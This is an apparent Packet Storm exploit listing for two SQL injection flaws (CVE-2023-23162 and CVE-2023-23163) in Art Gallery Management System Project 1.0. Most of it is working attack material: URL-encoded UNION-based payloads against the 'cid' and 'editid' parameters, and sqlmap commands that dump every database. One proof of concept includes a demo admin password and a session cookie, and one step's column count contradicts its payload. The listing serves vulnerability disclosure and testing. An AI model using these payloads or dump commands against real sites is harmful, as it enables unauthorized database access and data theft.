Lucene search

K
packetstormRahul PatwariPACKETSTORM:171643
HistoryApr 03, 2023 - 12:00 a.m.

Art Gallery Management System Project 1.0 SQL Injection

2023-04-0300:00:00
Rahul Patwari
packetstormsecurity.com
165
exploit
sql injection
unauthenticated
vendor
software
version
cve
proof of concept
xampp
windows 10
payload
manual data retrieval
sqlmap
automated data retrieval
admin login
manage art type
edit page

EPSS

0.005

Percentile

77.5%

`# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated  
# Date: 20/01/2023  
# Exploit Author: Rahul Patwari  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
# CVE : CVE-2023-23162  
  
# Proof of Concept:  
  
# 1- Install The application Art Gallery Management System Project v1.0  
# 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu.  
# 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown.  
# 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.  
# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.  
Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures  
  
# 6- for manually getting data from the database insert the below payload to see the user of the database.  
payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs  
  
# 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt".  
# 8- now to get all database data use the below "sqlmap" command to fetch all the data.  
Command: sqlmap -r request.txt -p cid --dump-all --batch  
  
# Go to this url "  
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs  
"  
  
  
  
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated  
# Date: 20/01/2023  
# Exploit Author: Rahul Patwari  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
# CVE : CVE-2023-23163  
  
# Proof of Concept:  
  
# 1- Install The application Art Gallery Management System Project v1.0  
  
# 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>.  
URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php  
  
# 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar.  
  
# 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type.  
  
# 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows.  
  
# 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.  
  
# 7- Now find how many column are returns by the SQL query. this query will return 6 column.  
Payload:editid=6%27order%20by%203%20--%20-  
  
# 8- For manually get data of database insert the below payload to see the user of the database.  
payload: editid=-6%27union%20all%20select%201,user(),3--%20-  
  
# 9- Now to get all database data use below "sqlmap" command to fetch all the data.  
Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch  
  
  
`

EPSS

0.005

Percentile

77.5%

Related for PACKETSTORM:171643